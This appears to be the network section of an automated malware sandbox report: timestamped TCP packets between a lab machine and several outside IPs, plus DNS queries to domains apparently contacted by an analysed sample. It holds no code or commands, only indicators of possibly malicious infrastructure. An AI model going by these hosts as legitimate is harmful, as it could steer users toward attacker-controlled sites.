                                                    Jul 3, 2024 17:52:58.995086908 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:58.995115995 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.001957893 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.002007008 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.002010107 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.003792048 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.003806114 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.003817081 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.003823042 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.003896952 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.085689068 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.085855961 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.085865974 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.085882902 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.085895061 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.085993052 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.086174011 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.086338997 CEST8049760144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:52:59.086457968 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:52:59.948012114 CEST4976080192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:00.966507912 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:00.971491098 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:00.972363949 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:00.976248980 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:00.981259108 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:00.981282949 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519268036 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519328117 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519381046 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.519396067 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519431114 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519464016 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519479036 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.519534111 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519582033 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.519615889 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519665003 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519706964 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.519716024 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519751072 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.519804955 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.524386883 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.524422884 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.524467945 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.526413918 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.526475906 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.526505947 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.526526928 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.572945118 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.607254028 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.607369900 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.607382059 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.607393980 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.607419968 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.607460022 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:01.607781887 CEST8049761144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:01.607825041 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:02.490746975 CEST4976180192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:03.498531103 CEST4976280192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:03.503572941 CEST8049762144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:03.503674984 CEST4976280192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:03.505568981 CEST4976280192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:03.510456085 CEST8049762144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:04.070106983 CEST8049762144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:04.070240021 CEST8049762144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:04.070313931 CEST4976280192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:04.073240042 CEST4976280192.168.2.6144.208.124.10
                                                    Jul 3, 2024 17:53:04.078318119 CEST8049762144.208.124.10192.168.2.6
                                                    Jul 3, 2024 17:53:09.668627024 CEST4976380192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:09.673472881 CEST8049763162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:09.673542976 CEST4976380192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:09.675602913 CEST4976380192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:09.680459023 CEST8049763162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:10.503029108 CEST8049763162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:10.503110886 CEST8049763162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:10.503150940 CEST8049763162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:10.503503084 CEST4976380192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:11.182405949 CEST4976380192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:12.206250906 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:12.212007046 CEST8049764162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:12.215511084 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:12.215511084 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:12.220494986 CEST8049764162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:13.069911003 CEST8049764162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:13.069937944 CEST8049764162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:13.070293903 CEST8049764162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:13.070318937 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:13.078180075 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:13.729406118 CEST4976480192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:14.750185013 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:14.756067991 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:14.758302927 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:14.762197971 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:14.767210960 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:14.767337084 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:15.598923922 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:15.599317074 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:15.599334002 CEST8049765162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:15.599371910 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:15.599410057 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:16.276170969 CEST4976580192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:17.323637009 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:17.328790903 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:17.328871012 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:17.331583977 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:17.336648941 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:18.155076981 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:18.155098915 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:18.155112982 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:18.155175924 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:18.156857014 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:18.156907082 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:18.157880068 CEST4976680192.168.2.6162.43.101.114
                                                    Jul 3, 2024 17:53:18.162985086 CEST8049766162.43.101.114192.168.2.6
                                                    Jul 3, 2024 17:53:23.541347980 CEST4976780192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:23.549719095 CEST804976745.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:23.549810886 CEST4976780192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:23.552231073 CEST4976780192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:23.557372093 CEST804976745.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:25.057482004 CEST4976780192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:25.063249111 CEST804976745.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:25.064469099 CEST4976780192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:26.075923920 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:26.080780029 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:26.080873013 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:26.082559109 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:26.088136911 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542579889 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542632103 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542643070 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542702913 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.542824984 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542835951 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542845964 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542851925 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.542865038 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.542898893 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.543112993 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.543153048 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.543306112 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.543318033 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.543355942 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.547791004 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.547802925 CEST804976845.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:27.547846079 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:27.588800907 CEST4976880192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.607350111 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.612351894 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:28.612601995 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.614392996 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:28.621515989 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:28.621879101 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.119978905 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143215895 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143230915 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143241882 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143280029 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143330097 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.143951893 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143964052 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143974066 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.143990040 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144001007 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144032001 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144932032 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144943953 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144954920 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.144977093 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.144977093 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.145005941 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:30.145442009 CEST804976945.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:30.145484924 CEST4976980192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.140969992 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.145780087 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:31.146028042 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.148272038 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:31.153199911 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:32.511399031 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:32.562216043 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.376669884 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.378485918 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.380100965 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.380115032 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:38.380182981 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.380182981 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.409202099 CEST4977080192.168.2.645.113.122.18
                                                    Jul 3, 2024 17:53:38.414244890 CEST804977045.113.122.18192.168.2.6
                                                    Jul 3, 2024 17:53:43.457398891 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.462332964 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:43.462426901 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.464940071 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:43.470056057 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098350048 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098366022 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098436117 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:44.098823071 CEST8049772172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:44.098891973 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:44.981322050 CEST4977280192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:45.998362064 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.003703117 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.003793001 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.005815029 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.010947943 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653047085 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653089046 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.653234959 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:46.653738022 CEST8049773172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:46.654280901 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:47.510679007 CEST4977380192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.529865980 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.534789085 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:48.535082102 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.538191080 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:48.543234110 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:48.543737888 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176048994 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176536083 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176548958 CEST8049774172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:49.176659107 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:50.042068958 CEST4977480192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.060606003 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.066368103 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.070313931 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.072808027 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.078250885 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731034040 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731097937 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731230021 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.731528044 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:53:51.731576920 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.735790968 CEST4977580192.168.2.6172.217.18.19
                                                    Jul 3, 2024 17:53:51.740760088 CEST8049775172.217.18.19192.168.2.6
                                                    Jul 3, 2024 17:54:05.580352068 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.591922998 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:05.591989994 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.594270945 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:05.604835033 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244419098 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244780064 CEST804977664.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:06.244872093 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:07.106178999 CEST4977680192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.129138947 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.134011030 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.134087086 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.153166056 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:08.158044100 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772382975 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772515059 CEST804977764.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:08.772624016 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:09.666788101 CEST4977780192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.684755087 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.689718008 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:10.694257975 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.698177099 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:10.703880072 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:10.703896046 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.343502998 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.343997955 CEST804977864.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:11.344064951 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:12.197985888 CEST4977880192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.451227903 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.457258940 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:14.457396030 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.460971117 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:14.467137098 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122764111 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122782946 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122796059 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122864962 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122875929 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122888088 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122899055 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122910023 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.122946024 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.122987986 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.122987986 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.123114109 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.123126030 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.123157978 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.128501892 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.128537893 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.134164095 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.219712019 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.219741106 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220211029 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220215082 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220226049 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220237017 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220246077 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220257044 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220263958 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220333099 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.220931053 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220942020 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.220952034 CEST804977964.190.62.22192.168.2.6
                                                    Jul 3, 2024 17:54:15.221004009 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.221004009 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.223943949 CEST4977980192.168.2.664.190.62.22
                                                    Jul 3, 2024 17:54:15.228784084 CEST804977964.190.62.22192.168.2.6

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 17:51:02.521353006 CEST5911453192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:02.590318918 CEST53591141.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:18.358464003 CEST6551753192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:18.612556934 CEST53655171.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:32.420876980 CEST5133753192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:32.444983006 CEST53513371.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:46.076648951 CEST6158553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:51:46.548752069 CEST53615851.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:51:59.936331987 CEST6260953192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:00.558340073 CEST53626091.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:14.389023066 CEST5547153192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:14.501841068 CEST53554711.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:28.030612946 CEST4997153192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:28.334990978 CEST53499711.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:41.858103037 CEST5172853192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:41.934259892 CEST53517281.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:52:55.390187025 CEST6474253192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:52:55.871165037 CEST53647421.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:09.094197035 CEST5140253192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:09.665852070 CEST53514021.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:23.172265053 CEST6269553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:23.537981987 CEST53626951.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:43.437366962 CEST5500553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:43.454359055 CEST53550051.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:53:56.748897076 CEST5256453192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:53:57.084956884 CEST53525641.1.1.1192.168.2.6
                                                    Jul 3, 2024 17:54:05.158168077 CEST5938553192.168.2.61.1.1.1
                                                    Jul 3, 2024 17:54:05.577315092 CEST53593851.1.1.1192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 3, 2024 17:51:02.521353006 CEST192.168.2.61.1.1.10x7f04Standard query (0)www.fondazionegtech.orgA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:18.358464003 CEST192.168.2.61.1.1.10xd61eStandard query (0)www.mengistiebethlehem.comA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:32.420876980 CEST192.168.2.61.1.1.10xf0ebStandard query (0)www.ad14.funA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:46.076648951 CEST192.168.2.61.1.1.10x92caStandard query (0)www.epicbazaarhub.comA (IP address)IN (0x0001)false
